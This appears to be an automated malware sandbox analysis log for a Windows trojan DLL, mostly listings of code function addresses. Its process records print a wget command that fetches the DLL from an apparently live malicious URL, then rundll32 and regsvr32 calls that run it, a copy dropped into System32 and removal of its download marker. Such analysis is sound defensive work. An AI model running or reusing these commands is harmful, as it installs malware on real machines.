Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014EA83C 5_2_014EA83C
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014DF038 5_2_014DF038
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014D48D4 5_2_014D48D4
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014DF8D0 5_2_014DF8D0
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014E70FC 5_2_014E70FC
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014F48F8 5_2_014F48F8
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014D409C 5_2_014D409C
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014F6098 5_2_014F6098
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014E80A4 5_2_014E80A4
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014DA368 5_2_014DA368
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014DE37C 5_2_014DE37C
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014EFB7C 5_2_014EFB7C
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014D4B78 5_2_014D4B78
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014F1B0C 5_2_014F1B0C
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014D433C 5_2_014D433C
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014ECBC4 5_2_014ECBC4
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014F2BD0 5_2_014F2BD0
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014F4BAC 5_2_014F4BAC
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014E23B4 5_2_014E23B4
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014D3248 5_2_014D3248
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014DE254 5_2_014DE254
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014D1208 5_2_014D1208
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014EA228 5_2_014EA228
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014E6238 5_2_014E6238
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014D9230 5_2_014D9230
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014EC230 5_2_014EC230
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014DAACC 5_2_014DAACC
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014F02E8 5_2_014F02E8
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014EAA8C 5_2_014EAA8C
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014E828C 5_2_014E828C
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014D1A88 5_2_014D1A88
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014D229C 5_2_014D229C
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014E529C 5_2_014E529C
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014F2AA4 5_2_014F2AA4
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014E42A0 5_2_014E42A0
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014DAD48 5_2_014DAD48
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014F3D54 5_2_014F3D54
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014D8564 5_2_014D8564
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014F6D60 5_2_014F6D60
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014F0D7C 5_2_014F0D7C
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014F5D7C 5_2_014F5D7C
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014DDD78 5_2_014DDD78
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014E9D18 5_2_014E9D18
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014E4D10 5_2_014E4D10
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014EF528 5_2_014EF528
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014F1528 5_2_014F1528
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014D7D3C 5_2_014D7D3C
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014DE538 5_2_014DE538
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014F45C4 5_2_014F45C4
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014D25DC 5_2_014D25DC
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014DFDD4 5_2_014DFDD4
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014D2DE8 5_2_014D2DE8
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014E1DA8 5_2_014E1DA8
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014F4DB4 5_2_014F4DB4
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014DCDB0 5_2_014DCDB0
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014D6C40 5_2_014D6C40
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014D8458 5_2_014D8458
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014F446C 5_2_014F446C
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014E6C60 5_2_014E6C60
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014E7C04 5_2_014E7C04
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014F1418 5_2_014F1418
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014EF414 5_2_014EF414
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014F6410 5_2_014F6410
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014E3C2C 5_2_014E3C2C
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014D3C20 5_2_014D3C20
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014E54C4 5_2_014E54C4
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014D1CD8 5_2_014D1CD8
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014D248C 5_2_014D248C
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014DFC84 5_2_014DFC84
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014E775C 5_2_014E775C
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014E3F50 5_2_014E3F50
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014F4F70 5_2_014F4F70
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014F1F04 5_2_014F1F04
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014DB714 5_2_014DB714
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014DA73C 5_2_014DA73C
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014E47EC 5_2_014E47EC
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014F17E4 5_2_014F17E4
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014D27E0 5_2_014D27E0
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014E8788 5_2_014E8788
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014DBF84 5_2_014DBF84
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014EF794 5_2_014EF794
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014D2FA8 5_2_014D2FA8
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014DF7A8 5_2_014DF7A8
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014EEFA4 5_2_014EEFA4
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014EAFB8 5_2_014EAFB8
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014D4E58 5_2_014D4E58
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014E0E04 5_2_014E0E04
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014E561C 5_2_014E561C
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014E6628 5_2_014E6628
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014EB6C0 5_2_014EB6C0
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014DFEDC 5_2_014DFEDC
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014D2EE8 5_2_014D2EE8
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014D5EE4 5_2_014D5EE4
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014DDEF0 5_2_014DDEF0
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014F6688 5_2_014F6688
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014F3698 5_2_014F3698
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014F0EAB 5_2_014F0EAB
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014EA6B8 5_2_014EA6B8
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001EA80000000 6_2_000001EA80000000
Source: C:\Windows\System32\rundll32.exe Code function: 7_2_00000292F30A0000 7_2_00000292F30A0000
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00440000 8_2_00440000
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004994E8 8_2_004994E8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004A409C 8_2_004A409C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004A5C94 8_2_004A5C94
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004B5D7C 8_2_004B5D7C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004A25B4 8_2_004A25B4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00497E74 8_2_00497E74
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0049BA00 8_2_0049BA00
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004A6628 8_2_004A6628
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004AB6C0 8_2_004AB6C0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0049FEDC 8_2_0049FEDC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00495EE4 8_2_00495EE4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004B6688 8_2_004B6688
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004B4F70 8_2_004B4F70
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004A3320 8_2_004A3320
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004AA38C 8_2_004AA38C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00497BB8 8_2_00497BB8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00496C40 8_2_00496C40
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00498458 8_2_00498458
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004B446C 8_2_004B446C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004A6C60 8_2_004A6C60
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0049B078 8_2_0049B078
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004B3078 8_2_004B3078
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004B087C 8_2_004B087C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004A7870 8_2_004A7870
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00499474 8_2_00499474
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004A7C04 8_2_004A7C04
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004B1418 8_2_004B1418
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004B6410 8_2_004B6410
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004AF414 8_2_004AF414
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004A3C2C 8_2_004A3C2C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00493C20 8_2_00493C20
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0049F038 8_2_0049F038
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0049383C 8_2_0049383C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004AA83C 8_2_004AA83C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004A54C4 8_2_004A54C4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00491CD8 8_2_00491CD8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0049F8D0 8_2_0049F8D0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004948D4 8_2_004948D4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004B48F8 8_2_004B48F8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004A70FC 8_2_004A70FC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0049248C 8_2_0049248C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0049FC84 8_2_0049FC84
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004B6098 8_2_004B6098
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0049409C 8_2_0049409C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004A80A4 8_2_004A80A4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0049AD48 8_2_0049AD48
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004AB95C 8_2_004AB95C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004B3D54 8_2_004B3D54
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004B6D60 8_2_004B6D60
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00498564 8_2_00498564
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004AE964 8_2_004AE964
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0049DD78 8_2_0049DD78
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004B0D7C 8_2_004B0D7C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004AF108 8_2_004AF108
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004A9D18 8_2_004A9D18
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00491910 8_2_00491910
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004A4D10 8_2_004A4D10
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00495914 8_2_00495914
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004AF528 8_2_004AF528
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004B1528 8_2_004B1528
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0049E538 8_2_0049E538
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00497D3C 8_2_00497D3C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004B45C4 8_2_004B45C4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004AC9D8 8_2_004AC9D8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004925DC 8_2_004925DC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004939D4 8_2_004939D4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0049FDD4 8_2_0049FDD4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00492DE8 8_2_00492DE8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004B21FC 8_2_004B21FC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004B4180 8_2_004B4180
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004A1DA8 8_2_004A1DA8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004A11AC 8_2_004A11AC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004B71A0 8_2_004B71A0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004B31A4 8_2_004B31A4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0049CDB0 8_2_0049CDB0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004B4DB4 8_2_004B4DB4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00493248 8_2_00493248
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00494E58 8_2_00494E58
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0049E254 8_2_0049E254
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004A7E54 8_2_004A7E54
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00491208 8_2_00491208
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004A0E04 8_2_004A0E04
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004A561C 8_2_004A561C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004AA228 8_2_004AA228
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004A6238 8_2_004A6238
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00499230 8_2_00499230
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004AC230 8_2_004AC230
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0049AACC 8_2_0049AACC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00492EE8 8_2_00492EE8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004B02E8 8_2_004B02E8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0049DEF0 8_2_0049DEF0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00491A88 8_2_00491A88
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004AAA8C 8_2_004AAA8C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004A828C 8_2_004A828C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004B3698 8_2_004B3698
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0049229C 8_2_0049229C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004A529C 8_2_004A529C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004B0EAB 8_2_004B0EAB
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004A42A0 8_2_004A42A0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004B2AA4 8_2_004B2AA4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004AA6B8 8_2_004AA6B8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004A775C 8_2_004A775C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004A3F50 8_2_004A3F50
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004A7368 8_2_004A7368
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00494B78 8_2_00494B78
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0049E37C 8_2_0049E37C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004AFB7C 8_2_004AFB7C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004B1B0C 8_2_004B1B0C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004B1F04 8_2_004B1F04
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0049B714 8_2_0049B714
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0049433C 8_2_0049433C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0049A73C 8_2_0049A73C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004ACBC4 8_2_004ACBC4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004B2BD0 8_2_004B2BD0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004A47EC 8_2_004A47EC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004927E0 8_2_004927E0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004B17E4 8_2_004B17E4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004A8788 8_2_004A8788
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0049BF84 8_2_0049BF84
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004AF794 8_2_004AF794
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00492FA8 8_2_00492FA8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0049F7A8 8_2_0049F7A8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004B4BAC 8_2_004B4BAC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004AEFA4 8_2_004AEFA4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004AAFB8 8_2_004AAFB8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004A23B4 8_2_004A23B4
Found potential string decryption / allocating functions
Source: C:\Windows\System32\regsvr32.exe Code function: String function: 0000000180029B0C appears 44 times
Tries to load missing DLLs
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\wget.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "http://clotizen.dothome.co.kr/members/lZTkIb3OkjcV/" > cmdline.out 2>&1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "http://clotizen.dothome.co.kr/members/lZTkIb3OkjcV/"
Source: unknown Process created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\download\NjszMzh0ar.dll"
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\download\NjszMzh0ar.dll",#1
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\download\NjszMzh0ar.dll
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\download\NjszMzh0ar.dll",#1
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\download\NjszMzh0ar.dll,AOBplENEwxGsLJOHWaHDTizor
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\QKXGFEEVVr\VycaGa.dll"
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\download\NjszMzh0ar.dll,BSUOlvQdFaMbSsYDjgkGG
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\download\NjszMzh0ar.dll,DllRegisterServer
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "http://clotizen.dothome.co.kr/members/lZTkIb3OkjcV/" Jump to behavior
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\download\NjszMzh0ar.dll",#1 Jump to behavior
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\download\NjszMzh0ar.dll Jump to behavior
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\download\NjszMzh0ar.dll,AOBplENEwxGsLJOHWaHDTizor Jump to behavior
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\download\NjszMzh0ar.dll,BSUOlvQdFaMbSsYDjgkGG Jump to behavior
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\download\NjszMzh0ar.dll,DllRegisterServer Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\download\NjszMzh0ar.dll",#1 Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\QKXGFEEVVr\VycaGa.dll" Jump to behavior
Source: C:\Windows\SysWOW64\wget.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{56FDF344-FD6D-11d0-958A-006097C9A090}\InProcServer32 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\Desktop\cmdline.out Jump to behavior
Source: classification engine Classification label: mal100.troj.evad.win@22/3@1/29
Source: C:\Windows\System32\regsvr32.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014DBA00 CreateToolhelp32Snapshot,Process32NextW,Process32FirstW,FindCloseChangeNotification, 5_2_014DBA00
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\download\NjszMzh0ar.dll",#1
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7048:120:WilError_01
Source: C:\Windows\SysWOW64\wget.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\wget.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\rundll32.exe Automated click: OK
Source: C:\Windows\System32\rundll32.exe Automated click: OK
Source: C:\Windows\System32\rundll32.exe Automated click: OK
Source: Window Recorder Window detected: More than 3 window changes detected
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_00000001800116CD push rdi; ret 5_2_00000001800116D4
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180011C59 push rdi; ret 5_2_0000000180011C62
PE file contains sections with non-standard names
Source: NjszMzh0ar.dll.2.dr Static PE information: section name: _RDATA
Registers a DLL
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\download\NjszMzh0ar.dll
Drops PE files
Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\System32\QKXGFEEVVr\VycaGa.dll (copy) Jump to dropped file
Source: C:\Windows\SysWOW64\wget.exe File created: C:\Users\user\Desktop\download\NjszMzh0ar.dll Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\System32\QKXGFEEVVr\VycaGa.dll (copy) Jump to dropped file

Hooking and other Techniques for Hiding and Protection
barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\System32\regsvr32.exe File opened: C:\Windows\system32\QKXGFEEVVr\VycaGa.dll:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Found large amount of non-executed APIs
Source: C:\Windows\System32\regsvr32.exe API coverage: 6.3 %
Source: C:\Windows\System32\regsvr32.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180031F98 _invalid_parameter_noinfo,_invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 5_2_0000000180031F98
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180032754 FindFirstFileExW, 5_2_0000000180032754
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180032C30 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 5_2_0000000180032C30
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180031F98 _invalid_parameter_noinfo,_invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 5_2_0000000180031F98
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0049FEDC FindNextFileW,FindFirstFileW, 8_2_0049FEDC
Source: C:\Windows\System32\regsvr32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
